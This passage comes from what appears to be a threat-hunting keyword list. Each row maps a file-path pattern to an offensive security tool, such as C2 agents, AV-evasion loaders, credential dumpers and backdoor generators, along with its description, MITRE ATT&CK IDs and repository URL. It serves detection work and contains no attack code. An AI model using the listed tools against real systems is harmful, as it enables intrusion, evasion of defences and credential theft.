Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/athena_utils/*.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/AthenaPlugins/bin/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/AthenaSMB/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/AthenaTests/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/AtlasReaper.git*,offensive_tool_keyword,AtlasReaper,A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.,T1210.002 - T1078.003 - T1046 ,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://github.com/werdhaihai/AtlasReaper,1,1,N/A,3,3,202,21,2023-09-14T23:50:33Z,2023-06-24T00:18:41Z -*/AtomLdr.git*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*/attackercan/*,offensive_tool_keyword,Github Username,github Penetration tester repo hosting malicious code,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/attackercan/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/attacks/*.py,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/AttackServers/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/AttackSurfaceMapper.git*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,1,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z 
-*/Augustus.git*,offensive_tool_keyword,Augustus,Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.,T1055.012 - T1027.002 - T1136.001 - T1562.001,TA0005 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/TunnelGRE/Augustus,1,1,N/A,6,2,107,23,2023-08-27T10:37:51Z,2023-08-21T15:08:40Z -*/auth/cc2_auth.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*/auth-owners.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/auth-spoof.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/autobloody.git*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*/autobloody/archive*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*/AutoBypass.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*/AutoSmuggle.git*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - 
TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*/autotimeliner*,offensive_tool_keyword,autotimeliner,Automagically extract forensic timeline from volatile memory dumps.,T1547 - T1057 - T1003,TA0005 - TA0008,N/A,N/A,Forensic Exploitation tools,https://github.com/andreafortuna/autotimeliner,1,1,N/A,N/A,2,119,23,2023-03-17T07:29:34Z,2018-11-12T16:13:32Z -*/auxiliary/scanner/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/avet.git*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*/avet_fabric.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/avet_script_config.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*/avoid_badchars.py*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*/avred.git*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*/avred.py*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense 
Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*/avred.py*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*/avredweb.py *,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*/awesome-burp-extensions/*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*/awesome-pentest*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/aws__enum_account*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/aws__enum_account/main.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/AWS-Loot*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,1,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*/Azure-AccessPermissions.git*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,1,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*/AzureC2Relay*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*/AzureHound.ps1*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/B374K*,offensive_tool_keyword,b374k,This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. 
All actions take place within a web browser,T1021 - T1028 - T1071 - T1105 - T1135,TA0002 - TA0003 - TA0005,N/A,N/A,Web Attacks,https://github.com/b374k/b374k,1,0,N/A,N/A,10,2248,783,2023-07-06T20:23:03Z,2014-01-09T04:43:32Z -*/BabelStrike.git*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,1,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*/BabelStrike.py*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,1,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*/BackDoor*,offensive_tool_keyword,_,keyword observed in multiple backdoor tools,T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001,TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/backdoor.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*/backdoor/traitor.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/backdoor_all_users.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/backdoor_apk*,offensive_tool_keyword,TheFatRat,Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.,T1027 - T1059 - T1105 - T1218,TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/Screetsec/TheFatRat,1,0,N/A,N/A,10,8267,2217,2023-06-11T19:16:05Z,2016-07-24T10:30:19Z -*/backoff.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/backorifice-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/backorifice-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Backstab.git,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*/Backstab/Backstab*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*/backstab_src/*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*/BackupOperatorToDA.git*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*/BackupPrivSam/*,offensive_tool_keyword,cobaltstrike,A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/m57/cobaltstrike_bofs,1,1,N/A,10,10,153,25,2022-07-23T20:37:52Z,2020-07-30T22:36:51Z -*/bacnet-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/BadZure.git*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,1,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*/BadZure/*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,1,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*/banner.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/BaseNEncoder.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
